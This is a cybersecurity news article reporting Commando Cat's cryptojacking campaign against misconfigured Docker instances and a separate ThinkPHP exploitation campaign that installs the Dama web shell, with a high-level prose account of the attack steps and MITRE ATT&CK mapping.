The cybersecurity landscape continues to be challenged by sophisticated threats, as evidenced by the recent activities attributed to a threat actor named Commando Cat. This entity is currently implicated in a cryptojacking campaign targeting poorly secured Docker instances. By exploiting vulnerabilities in these configurations, Commando Cat deploys cryptocurrency miners, aiming to profit financially from compromised resources.
In a recent analysis, Trend Micro researchers Sunil Bharti and Shubham Singh revealed that the attackers utilize a Docker image container, cmd.cat/chattr, which pulls its payload from the adversary’s command-and-control (C&C) infrastructure. This campaign is particularly alarming due to its reliance on the open-source Commando project for the creation of an innocuous-looking container. The tactics employed were first documented earlier this year by Cado Security.
The methodology of the attack involves targeting misconfigured Docker remote API servers. Once access is gained, attackers instantiate a container using the cmd.cat/chattr image. They then utilize the chroot command to escape the constraints of the container and access the underlying host operating system. The process culminates in the retrieval of a malicious cryptocurrency miner binary, likely identified as ZiggyStarTux, utilizing either curl or wget commands from a C&C server.
The implications of this attack are significant; the use of Docker images allows for the deployment of cryptojacking scripts in a manner that circumvents detection by traditional security measures. Cybersecurity researchers have emphasized that this method illustrates a growing trend among attackers who exploit Docker vulnerabilities while remaining under the radar.
Further complicating the cybersecurity landscape, Akamai has reported that a suspected Chinese-speaking threat actor is leveraging long-standing security weaknesses in ThinkPHP applications. This campaign unfolds amidst an ongoing exploitation of vulnerabilities such as CVE-2018-20062 and CVE-2019-9082 to deploy a web shell referred to as Dama, which was first identified in an attack that initiated on October 17, 2023.
According to Akamai researchers, the exploit works by retrieving additional obfuscated code from another compromised ThinkPHP server. After achieving an initial foothold, the adversary installs the Dama web shell to maintain persistent access to the targeted server. This shell is outfitted with advanced functionalities that enable the gathering of system data, file uploads, network port scanning, privilege escalation, and file system navigation. Such access facilitates a range of operations, including file editing, deletion, and timestamp manipulation, all aimed at obfuscation.
The persistence and effectiveness of these attacks illustrate a concerning trend wherein adversaries capitalize on comprehensive web shells designed for extensive control over victimized systems. Notably, not all targeted entities were using ThinkPHP, suggesting a broader indiscriminate approach from the attackers in selecting potential victims.
From a tactical perspective, both attack scenarios align with several MITRE ATT&CK framework techniques, including Initial Access through exploitation of misconfigurations, Persistence via the installation of a malicious web shell, and Privilege Escalation through the use of advanced command techniques. As these cyber threats evolve, it is crucial for business owners to remain vigilant, ensuring that security measures are adequately tailored to mitigate the risks associated with such sophisticated attacks.
